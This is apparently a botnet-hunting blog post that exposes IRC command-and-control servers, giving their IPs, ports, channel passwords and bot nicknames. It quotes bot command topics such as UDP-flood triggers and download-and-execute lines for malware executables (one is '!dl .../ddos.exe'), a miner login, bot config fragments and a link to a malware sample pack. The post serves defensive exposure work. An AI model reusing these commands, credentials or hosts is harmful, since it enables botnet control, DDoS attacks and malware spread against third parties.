Now talking in #pontianakcrew
Topic On: [ #pontianakcrew ] [Join #Dor Untuk DDOS | Join #scan Buat Scanner]
Topic By: [ Guardi4n ]
Now talking in #dor
Topic On: [ #dor ] [ .user crack .udpflood Ip 100 100 ]
Topic By: [ Guardi4n ]
<? /* * * #ReloaD-X@corp. 2010 * REcoding by: bogel * recky@doctor.com * *
64.120.239.219(ngrBot hosted in United States Scranton Network Operations Center Inc.)
C&C Server: 64.120.239.219:1887
Server Password:
Username: fbidqck
Nickname: n{DE|XPa}fbidqck
Channel: #pool (Password: leonis)
Channeltopic: :~pu hxxp://www.sendspace.com/pro/dl/3qtgh8 da611193656522f073e0e64c8a65969a -r
Downloads this file, which is another ngr botnet: hxxp://69.31.136.33/dlpro/cee0ddc1c1f7eb6a248759eaf0f4cc45/50d9e2b9/3qtgh8/bonbin.exe
Sample was found by our Turkish kebap friend aLiSs.
hosting info: http://whois.domaintools.com/64.120.239.219
www.btcminers.biz(Bit Coin Miner hosted in Russian Federation Saint Petersburg Selectel Ltd.)
Resolved : [www.btcminers.biz] To [31.186.102.189]
Resolved : [www.btcminers.biz] To [31.186.102.182]
http://www.btcminers.biz:789/ -u m2n3r_A -p refghvytre
| POST / HTTP/1.1. | .Authorization: | Basic bTJuM3JfQT A | pyZWZnaHZ5dHJl.. | Content-Length: | 43..User-Agent: | Ufasoft bitcoin- | miner/0.20 (Wind | ows NT XP 5.1.26 | 00 Service Pack | 2) ..Host: local | host:789..Cache- | Control: no-cach
64.56.64.29(ngr botnet hosted in United States Los Angeles Perfect International In)
server: 64.56.64.29:1887
server: 174.37.172.71:1887
server: 184.172.60.181:1887
server: 5.153.6.203 TCP:1887
Server Password:
Username: hxfyijc
Nickname: n{DE|XPa}hxfyijc
Channel: #pool (Password: leonis)
Channel: #r3
Channeltopic: :~pu hxxp://hotfile.com/dl/184384511/5b0f4b2/omaigato.exe 765cce9dee5448f58d9e798d91dbf809 ~s -o ~s
Find more info about the owner and domains by searching for 1887 in this blog.
Downloaded samples: hxxp://199.7.177.244/dl/184384734/6e6cd1d/all.exe ==> downloads these links:
hxxp://80.86.83.93/index (2musicaonline.com)
hxxp://80.86.83.93/Emo-Screamo/ (2musicaonline.com)
hxxp://hotfile.com/dl/184299133/b91a140/8346g527rg239gth34t24t.html
Thanks to aLiSs the Turkish kebap for submitting samples.
hosting info: http://whois.domaintools.com/64.56.64.29
Master Poko Perlbot vS PiF(linux bots hosted in France Paris Gandi Sas)
var $config = array("server"=>"92.243.21.133", "port"=>"6667", "pass"=>"", "prefix"=>"soldiers", "maxrand"=>"5", "chan"=>"#ddos2", "chan2"=>"#ddos2", "key"=>"ddos", "modes"=>"+p", "password"=>"dor", "trigger"=>".", "hostauth"=>"*"
Local users: Current Local Users: 188 Max: 190
Global users: Current Global Users: 188 Max: 190
Around 130 Linux bots in #unix.
Master Poko Perlbot vS PiF:
#!/usr/bin/perl
#
# Master Poko Perlbot vS PiF
#
my @mast3rs = ("Norman","Norman-");
my
afkm.in(irc bot spreading through skype hosted in Germany Karlsruhe 1&1 Internet Ag)
This botnet belongs to our lame friend snk (he uses aspergillus mod). It was reported by I Post Your Info here.
Domain names used by snk:
w4hw5wg3488h.net (this one is no longer active)
Resolved : [afkm.in] To [82.165.140.66] (active domain name used to control bots)
hxxp://213.165.83.232/b.exe (www.dgp-vision.de) (bot exe here)
The bot downloads 2 exe files
boat.trixi-diablolik.com(irc botnet hosted in United States Baltimore Gandi Us Inc.)
This server is owned by Serbian skid
Root Map: irc.MiloDjukanovic.net (9) Numeric ID:
I don't have the executable to find channels, so feel free to post them here if you find them.
server:boat.trixi-diablolik.com port:6667
PASS 0
NICK [A|W_XP|x32|1]gjywth
USER 14628 8 * :41909
Local users: Current Local Users: 9 Max: 1017
Global users: Current Global Users:
94mb samples for analysis purposes
This package has a lot of banking trojans, worms, etc. Have fun analysing them. Source
tv.zabetwo.com(irc botnet hosted in China Hefei Chinanet Anhui Province Network)
Resolved : [tv.zabetwo.com] To [60.172.229.56]
server: tv.zabetwo.com port:3324
PASS eee
NICK lbaauf
Channel #ng pass ng00
channel #us
other channels: #!, #Ma, #i
hosting info: http://whois.domaintools.com/60.172.229.56
irc.infctd.biz(irc botnet hosted in Sweden Stockholm Portlane Networks Ab)
Resolved : [irc.infctd.biz] To [46.246.93.77]
server: irc.infctd.biz port:6667
NICK [skank]5926101
USER nxmnrwy 0 0 :[skank]5926101
USERHOST [skank]5926101
MODE [skank]5926101 -x
JOIN #deneme101010
Now talking in #deneme101010
Topic On: [ #deneme101010 ] [ !dl http://mgtrading.org/ddos.exe c:/ddos.exe 1 ]
Topic By: [ voLwy ]
hosting info: http://whois.domaintools.com/46.246.93.77